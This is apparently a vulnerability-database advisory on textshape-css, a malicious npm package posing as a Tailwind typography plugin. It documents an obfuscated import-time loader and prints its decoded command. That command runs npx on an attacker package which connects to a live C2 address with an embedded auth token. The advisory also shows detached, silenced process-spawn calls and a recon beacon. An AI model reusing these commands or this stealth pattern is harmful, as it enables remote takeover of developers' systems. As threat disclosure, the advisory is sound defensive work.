VDB
GCVE-110-OSM-2026-6426
GCVE-110-OSM-2026-6426
Advisory PublishedCVSS 9.6/10
Installs a C2 agent at require-time on any host importing textshape-css@1.0.0, a Tailwind CSS typography plugin impersonator. A char-code-array-obfuscated IIFE (_.y()) in src/index.js reconstructs a command that downloads and executes the attacker-controlled runtimedev-link npm package via npx, which connects to C2 at http://194.11.226.41:4000 (3/91 VT detections, Rockhoster Private Limited, GB) using an embedded auth token. The process is fully detached and silenced (nohup/>/dev/null on Unix; windowsHide on Windows). A secondary styles.js IIFE writes system recon to tmpdir and beacons a campaign-linked npm package, linking textshape-css to the tailwind-typography-plus cluster via identical styles.js/utils.js file hashes.
Trigger: require-time IIFE (_.y()) at the bottom of src/index.js (no install scripts). All command strings are char-code-array-encoded and decoded with String.fromCodePoint at call time. Decoded command runs npx -y runtimedev-link@latest connecting to http://194.11.226.41:4000 with auth token zRlY7_JxvFY8_Zhhu8ih24iW_dT5Rb_9. On Windows: child_process.exec({windowsHide:true}).unref(). On Unix: child_process.spawn('/bin/sh',['-c','nohup <cmd> >/dev/null 2>&1 &'],{detached:true,stdio:'ignore'}).unref(). runtimedev-link (8 published versions, publisher: nathan.jin.dev@gmail.com) functions as the C2 agent connecting back to 194.11.226.41 port 4000. Secondary IIFE in styles.js (file hash identical to tailwind-typography-plus@2.1.0) collects process.arch/platform/execPath, writes recon JSON to os.tmpdir()/.tailwind-color-space-v2/probe-<pid>.json, and beacons the tailstyle-core npm package endpoint.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | textshape-css | all versions (affected) | — |
Browse GCVE Records
73,738 records in the GCVE database · Updated July 19, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.